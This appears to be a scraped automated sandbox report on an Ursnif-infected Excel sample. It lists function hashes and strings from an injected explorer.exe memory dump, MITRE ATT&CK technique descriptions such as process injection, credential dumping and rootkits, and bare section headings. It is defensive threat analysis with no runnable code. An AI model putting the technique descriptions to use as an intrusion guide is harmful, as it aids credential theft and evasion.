Instruction Fuzzy Hash: CFA1F630A18A0D8BC739DF29C885BB673D2FB95310F15A16DD88BC7251EA79EC478781

Uniqueness

Uniqueness Score: 8.94%

Function 05364B30, Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

POST, xrefs: 05364B6D
HTTP, xrefs: 05364B65

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: HTTP$POST
API String ID: 0-4028717631
Opcode ID: cdd9579d7d9d0e2352a4476e25971d0fa9d61270c0659d62f49116e11f338cc9
Instruction ID: a348a4122533a01077983f33a36aef0b0d7cc2edbb1e9f4cf33551e38eaf01ef
Opcode Fuzzy Hash: cdd9579d7d9d0e2352a4476e25971d0fa9d61270c0659d62f49116e11f338cc9
Instruction Fuzzy Hash: 6AD1913071CB199FCB69EF28D8D4AA9B7E1FB48700B50851EE48AC7655CF70E852CB81

Uniqueness

Uniqueness Score: 4.65%

Function 05368598, Relevance: 2.2, Strings: 1, Instructions: 959UNIQUE

Download Yara Rule

Strings

jAfr, xrefs: 05368805

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: jAfr
API String ID: 0-2301359037
Opcode ID: 57103389e328865b5a80a35a16d3113ce633ed12714c80a16baa4988b87dd154
Instruction ID: e4d2cd16d50412e32523dff5eb1889ccc195a05e37b86136f70ddeeb694956e9
Opcode Fuzzy Hash: 57103389e328865b5a80a35a16d3113ce633ed12714c80a16baa4988b87dd154
Instruction Fuzzy Hash: C8720E30618B448FDB78EF28C898A6AB7E6FBDC305F14892ED58AC3254DB74D545CB42

Uniqueness

Uniqueness Score: 100.00%

Function 0536CAA4, Relevance: 2.2, Strings: 1, Instructions: 924COMMON

Download Yara Rule

Strings

W, xrefs: 0536CB06

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 6e6916fc2852e33ae63e5ad741f5cd50e138203b39b566045dc94dbcaf13123c
Instruction ID: a67e8a1e0d225bf77a146abe7f012b937247cbe8777ca47539066477e97e7ade
Opcode Fuzzy Hash: 6e6916fc2852e33ae63e5ad741f5cd50e138203b39b566045dc94dbcaf13123c
Instruction Fuzzy Hash: 9742A131718A0C8FDB68EF68DC895B973E6F798301B54892DD88BC3255DE74E9068782

Uniqueness

Uniqueness Score: 1.37%

Function 05373C7C, Relevance: 2.1, Strings: 1, Instructions: 852COMMON

Download Yara Rule

Strings

@, xrefs: 05373FF0

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: @
API String ID: 1964310414-2766056989
Opcode ID: 9956d9e7f4daabf6446dc60ade4eea6ffc0207270108d26d0f0bb4a0deb61a0f
Instruction ID: 355d4a221a14d75c452650e6225c2fe319ecba556762f31345991a9ecf0e152e
Opcode Fuzzy Hash: 9956d9e7f4daabf6446dc60ade4eea6ffc0207270108d26d0f0bb4a0deb61a0f
Instruction Fuzzy Hash: 56525430618B498FEB68EF68D8997AAB7E2FB98301F54852ED44BC3160DF78D541CB41

Uniqueness

Uniqueness Score: 0.02%

Function 0537D03C, Relevance: 1.8, Strings: 1, Instructions: 511UNIQUE

Download Yara Rule

Strings

'Xr, xrefs: 0537D3A0

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: 'Xr
API String ID: 0-3660879455
Opcode ID: 4e54c2b8c1b41d5d24396fef39913030475b214fc68e1d0cfb3d585ee9d81404
Instruction ID: e5aa7d9aac56fa359267b3733ad6c3d713391f5e4e6a4958e8b9401586930a0c
Opcode Fuzzy Hash: 4e54c2b8c1b41d5d24396fef39913030475b214fc68e1d0cfb3d585ee9d81404
Instruction Fuzzy Hash: 55F15430B14E0D8FE768EB39DC996AA73D6FBD8311B548429980AC7264DF7CD842CB51

Uniqueness

Uniqueness Score: 100.00%

Function 0536F40C, Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

vids, xrefs: 0536F512

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: vids
API String ID: 0-3767230166
Opcode ID: d7279abbaf0749257a5747332791e2582ff022a3a4708a41fee5d62260338fab
Instruction ID: b60a28ccf7d40c4ee428deadfae8a528a6450acca85bbda71a5a0087aca2c764
Opcode Fuzzy Hash: d7279abbaf0749257a5747332791e2582ff022a3a4708a41fee5d62260338fab
Instruction Fuzzy Hash: D7C17C3161C7488FD729EF28D459BAAB7E5FBD5351F10892DE48AC3258DB74E801CB82

Uniqueness

Uniqueness Score: 6.12%

Function 05384918, Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

P, xrefs: 053849B7

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: b6e59a0eaf58957574999116e5cd990ec13f8aa4ae547859b6ea600007767770
Instruction ID: 600f76c956d19f177e9896ce97cee75a3d63051b23ec8019ced8b3bcd9fcbe10
Opcode Fuzzy Hash: b6e59a0eaf58957574999116e5cd990ec13f8aa4ae547859b6ea600007767770
Instruction Fuzzy Hash: 35A1903061CB4A8FEB58FB68D8997B977E6FB98305F04402AD48AC3250DF78D845CB42

Uniqueness

Uniqueness Score: 0.70%

Function 053625BC, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd91008ec85894687ff9ecdb94df49fd0cee68a67a8377a8528b01e86ac4350f
Instruction ID: 234cc695af9cfaa095900fbc005fc534fedfbf1fc47e4c2068cfac9f450c352f
Opcode Fuzzy Hash: bd91008ec85894687ff9ecdb94df49fd0cee68a67a8377a8528b01e86ac4350f
Instruction Fuzzy Hash: E2D19A3421CA088FDB68EF28D885A6AB7E2FBD5300F55856DE44BC3265DF74D846CB42

Uniqueness

Uniqueness Score: 0.00%

Function 05385C90, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a03f4b9b601013f4cc84932a5d7d442e57cf64f35b5a19cccd664403dabd9e
Instruction ID: 44c1886e05f94634adaed6004ac343c10192fa67790a6187fa1ab0806a15d2fd
Opcode Fuzzy Hash: 61a03f4b9b601013f4cc84932a5d7d442e57cf64f35b5a19cccd664403dabd9e
Instruction Fuzzy Hash: 59E1523060CB489FEB69EF18DC89ABA77E2FB98351F144529E48AC3160DF74D545CB82

Uniqueness

Uniqueness Score: 0.00%

Function 05380904, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e82027338e5459657113cb3fcf4b04ebc2aa8c4be56984b65b4a2f8e38e3fb
Instruction ID: 75d34fd16dd1feb7f18bbddaac946fb65a8d3b23b3e25f9288ccd05cac5bb458
Opcode Fuzzy Hash: 18e82027338e5459657113cb3fcf4b04ebc2aa8c4be56984b65b4a2f8e38e3fb
Instruction Fuzzy Hash: A3C15C30218B058FDB6CEF28D89DBBAB7E5FB84315F10452DD48BC2590DB78E4558B81

Uniqueness

Uniqueness Score: 0.00%

Function 05369774, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 35807156cba48015ba964e6166014386f632e1c692494212b4c67617f607e87a
Instruction ID: a4460b7b0f441c1dab4047eb97876cec01d611d1011e8dab16db9968c4231c06
Opcode Fuzzy Hash: 35807156cba48015ba964e6166014386f632e1c692494212b4c67617f607e87a
Instruction Fuzzy Hash: DCA16231718A088FDB79EF28D88966AB3D2F798700F65852DD48FC3254DE74A8478782

Uniqueness

Uniqueness Score: 0.00%

Function 05388F74, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: Find$File$First$AllocateCloseHeapNext
String ID:
API String ID: 445391567-0
Opcode ID: 158d5f7b13d328eb0b78e4ff85916a7a56c74ad1b3b5be48d0d892a530a4613c
Instruction ID: b6cec4cea81d3cf9a6aa9b73f76ddc001122799ae0b8059c65880db365a845a9
Opcode Fuzzy Hash: 158d5f7b13d328eb0b78e4ff85916a7a56c74ad1b3b5be48d0d892a530a4613c
Instruction Fuzzy Hash: 73A1713160CA088FEB58FF28E898A7977E6F798301F04462DE44BC3265DF78D9458B41

Uniqueness

Uniqueness Score: 0.00%

Function 05384014, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 988c5325fec45c253a23247fa4365cc932337930e0dc0bb1138f2b4094cd720b
Instruction ID: c79a91dfd2c7aed73f5e30ecc17368ed55919c2834682aeabe5f5bec120409d8
Opcode Fuzzy Hash: 988c5325fec45c253a23247fa4365cc932337930e0dc0bb1138f2b4094cd720b
Instruction Fuzzy Hash: BB71D03161CF0A4FDB68FF6CD889A76B3D1FBA8318B45426DD80AC3661DE74E9058781

Uniqueness

Uniqueness Score: 0.00%

Function 05375D34, Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b930c4329a53b8febbace28c5a1bbcc3a9ecab788506a6ae30ba10f82bba7e
Instruction ID: 8da0162e863bd6be846288e86ab20b65900c656203cd49ad275de55176ebe75c
Opcode Fuzzy Hash: e9b930c4329a53b8febbace28c5a1bbcc3a9ecab788506a6ae30ba10f82bba7e
Instruction Fuzzy Hash: AB814D3160DB0C8BDB28EF58EC896AAB7E5FB94701F15862ED44AC3255DF74D8018B82

Uniqueness

Uniqueness Score: 0.00%

Function 0536BA44, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3874eb5c339fb57201337d5a60fbf6f0b56df5405569b11d87152d658f625f37
Instruction ID: 3b21ec6257a8d4c45bdb9bc4da7d40fe838777c844963283069f19a4f5799be7
Opcode Fuzzy Hash: 3874eb5c339fb57201337d5a60fbf6f0b56df5405569b11d87152d658f625f37
Instruction Fuzzy Hash: 9581A5306087098FE768EF28E8A877677E5FB84314F20852DD49BC3655EE79D5078B41

Uniqueness

Uniqueness Score: 0.00%

Function 05374800, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f002bc3ca4e9e2b4554369f9406f726bcefa7eff38c154e32abd8f6fd19e88ad
Instruction ID: 5810175824f45252e55fae26fffdef90b5f4cad303f5854a98e7e3de2ad14b22
Opcode Fuzzy Hash: f002bc3ca4e9e2b4554369f9406f726bcefa7eff38c154e32abd8f6fd19e88ad
Instruction Fuzzy Hash: 7881333061CB4C8FDB59EF68D898A6AB7F1FB99301B01852EE44AC3254DF74E941CB81

Uniqueness

Uniqueness Score: 0.00%

Function 05388854, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7157a31bce5d34156eaf2dcf6e3c3a4a9510ff7fbc156ff8d0570ff26ec552
Instruction ID: 000be2de67b6437b4c8f4408e5007939596bc4fde3a4a2b56140c0bc25038535
Opcode Fuzzy Hash: 9b7157a31bce5d34156eaf2dcf6e3c3a4a9510ff7fbc156ff8d0570ff26ec552
Instruction Fuzzy Hash: 72717F31718B188FDB6CFF2DD885B7573D2FB88300B4444A9DC4ACB25ADA68DC418B82

Uniqueness

Uniqueness Score: 0.00%

Function 0537A43C, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ebb97b1cf3abe6d0d683cf0733409feb2d48bb3eef645db75a6e9f3de0b413
Instruction ID: 59faf8e90c837799d69e9cad2dd6e922f8139ee6280d6701bafc925a098ef7c3
Opcode Fuzzy Hash: 50ebb97b1cf3abe6d0d683cf0733409feb2d48bb3eef645db75a6e9f3de0b413
Instruction Fuzzy Hash: EC61C731A1CA5C4FD76DAB28A8456BE73D6FB94311B15412DE88BD3241EE78DC4287C2

Uniqueness

Uniqueness Score: 0.00%

Function 0536ECFC, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4aefc8cd049c888e9011e6b4d732bbbbee08783c03ee611b7d78943dfd08760
Instruction ID: 83b5a7c873a50790567b2eb2a17a1b469582c31b5fac81305f9ced23acc7b3d3
Opcode Fuzzy Hash: c4aefc8cd049c888e9011e6b4d732bbbbee08783c03ee611b7d78943dfd08760
Instruction Fuzzy Hash: F571C63161CB088FE714EF5DDC89666B7E6FB98701F10862EE44AC3214DB78E845CB82

Uniqueness

Uniqueness Score: 0.00%

Function 05363BD4, Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cbb4a352be44735db5e99acae208f66bc2f40fad81abd69260c4d1e058179
Instruction ID: 8feacd96ade5a864c2376cf6d88b58f1bd00e1bb569a38816eb3e3ccef6fc0df
Opcode Fuzzy Hash: 6e7cbb4a352be44735db5e99acae208f66bc2f40fad81abd69260c4d1e058179
Instruction Fuzzy Hash: 06714435719A488FDB68EF38DC9952977E2F798700B74882DE04BC3265DE74D846CB82

Uniqueness

Uniqueness Score: 0.00%

Function 0537C078, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: b3cd81cd7b59ae22540f2f4922b52e8c8db666a141f9836bf72371d99640b405
Instruction ID: 41110305110bc3115aa805f27f1f340de6e211659857ee8e2d6fa348a31cf523
Opcode Fuzzy Hash: b3cd81cd7b59ae22540f2f4922b52e8c8db666a141f9836bf72371d99640b405
Instruction Fuzzy Hash: D7716131A18A0E8FEB74EF68D899BA677E5FB98301F40852DD44AC3250DF39E945CB41

Uniqueness

Uniqueness Score: 0.00%

Function 05375A4C, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afab6f03cd843281b1c627aa27bce71b05449d6f560ac3b2d3f547f60271d99d
Instruction ID: 664b6f375a877111c6e497b015169107bfc0ef18d8b20e78f39fa41d16f0bf7d
Opcode Fuzzy Hash: afab6f03cd843281b1c627aa27bce71b05449d6f560ac3b2d3f547f60271d99d
Instruction Fuzzy Hash: D3517D31748E0D4FAB9CEF6DAC99AB976D2E7D8701704C129940AC3265EE78E8428781

Uniqueness

Uniqueness Score: 0.00%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Tactics:	Defense Evasion, Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as Remote Desktop Protocol , instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command , or other potentially difficult to monitor interactions.
Tactics:	Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.
Tactics:	Credential Access, Persistence, Privilege Escalation
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking ) and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor , Master Boot Record, or the System Firmware .
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
Tactics:	Command and Control, Defense Evasion
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Kernel drivers, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report bonifico__8156.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Initial Sample

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Signature Similarity

Similar Samples

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "bonifico__8156.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of local system or domain accounts.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	Azure AD, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
